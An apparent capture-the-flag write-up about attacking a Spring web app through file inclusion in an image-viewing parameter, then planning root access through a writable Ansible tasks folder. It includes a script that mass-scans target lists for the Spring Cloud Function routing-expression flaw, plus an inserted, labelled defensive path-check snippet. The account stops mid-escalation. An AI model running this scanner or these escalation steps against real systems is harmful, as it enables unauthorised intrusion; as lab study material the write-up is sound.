We have an upload feature in the web app that accepts PNG files. There are some bypasses for the file-type check, but they did not lead anywhere.
Once you upload a valid PNG/image file, you can view it by going to show_image; the filename is specified by the img parameter.
This is vulnerable to LFI: we can read any arbitrary file whose location is known.
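As an added illustration (not code from this write-up or from the target application), here is how a show_image-style handler should resolve its img parameter so that the arbitrary file read described above is not possible; the upload directory, file names and allowed extensions below are assumptions.

```python
import tempfile
from pathlib import Path
from typing import Optional

# Assumed policy: only image files stored directly in the upload directory may be served.
ALLOWED_SUFFIXES = {".png", ".jpg", ".jpeg", ".gif"}


def resolve_image(upload_dir: str, img: str) -> Optional[Path]:
    """Return the on-disk path for an `img` parameter, or None if it must be refused."""
    base = Path(upload_dir).resolve()
    # Only a bare file name is expected: anything containing a separator
    # ("../x", "/etc/passwd", "sub/x") is rejected before touching the filesystem.
    if not img or Path(img).name != img:
        return None
    candidate = (base / img).resolve()  # collapses "..", follows symlinks
    # The resolved target must still live inside the upload directory; this is what
    # catches a symlink placed in the upload directory that points elsewhere.
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES or not candidate.is_file():
        return None
    return candidate


def demo() -> dict:
    """Constructed sample layout: an upload dir with one real PNG, one non-image
    file, and one symlink that points outside the upload dir."""
    with tempfile.TemporaryDirectory() as d:
        uploads, secrets = Path(d, "uploads"), Path(d, "secrets")
        uploads.mkdir()
        secrets.mkdir()
        Path(uploads, "cat.png").write_bytes(b"\x89PNG\r\n\x1a\n")  # constructed stub
        Path(uploads, "notes.txt").write_text("not an image")
        Path(secrets, "flag.txt").write_text("constructed secret")
        try:
            Path(uploads, "leak.png").symlink_to(secrets / "flag.txt")
        except OSError:
            pass  # no symlink support: the name simply does not exist, still refused
        cases = ["cat.png", "notes.txt", "leak.png",
                 "../secrets/flag.txt", "/etc/passwd", ""]
        return {img: resolve_image(str(uploads), img) is not None for img in cases}


if __name__ == "__main__":
    for img, ok in demo().items():
        print(f"{img!r:25} -> {'served' if ok else 'refused'}")
```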
After some hefty enumeration we can find the absolute path of the web app by checking webapp.service. This filename was retrieved from /opt/automation/tasks/playbook_1.yml during initial enumeration, since supplying a directory location to the img parameter lists its sub-directories and their files:
Checking the service file, we can get the location of the web server's jar file.

```
[Unit]
Description=Spring WEb APP
After=syslog.target
```
```python
import sys
import requests

# The snippet on the page starts mid-script: `payload` (the SpEL expression sent
# in the routing-expression header) and `txt` (the file of target URLs) are
# defined above the part shown. They are read from the command line here so the
# script runs as-is: python3 scan.py targets.txt '<payload>'
txt = sys.argv[1]
payload = sys.argv[2]

data = 'test'
headers = {
    'spring.cloud.function.routing-expression': payload,
    'Accept-Encoding': 'gzip, deflate',
    'Accept': '*/*',
    'Accept-Language': 'en',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded'
}
path = '/functionRouter'

with open(txt) as f:
    urllist = f.readlines()

for url in urllist:
    url = url.strip('\n')
    target = url + path
    try:
        req = requests.post(url=target, headers=headers, data=data, verify=False, timeout=3)
    except requests.RequestException:
        # Connection errors/timeouts were not handled in the original; skip the host
        print(f'[-] {url} unreachable')
        continue
    code = req.status_code
    text = req.text
    rsp = '"error":"Internal Server Error"'
    # A 500 carrying this error body is the signature the script treats as vulnerable
    if code == 500 and rsp in text:
        print(f'[+] {url} is vulnerable')
        with open('vulnerable.txt', 'a+') as poc_file:
            poc_file.write(url + '\n')
    else:
        print(f'[-] {url} not vulnerable')
```
Looking further into writable folders and files, we can see that /opt/automation/tasks is writable by members of the staff group, and paul is a member of that group.
That directory held an Ansible playbook file for automating tasks.
From the enumeration, we were able to anticipate that any task created in this directory will be executed, hence to replicate it I created two tasks.
This one is for creating an .ssh directory in root's home directory.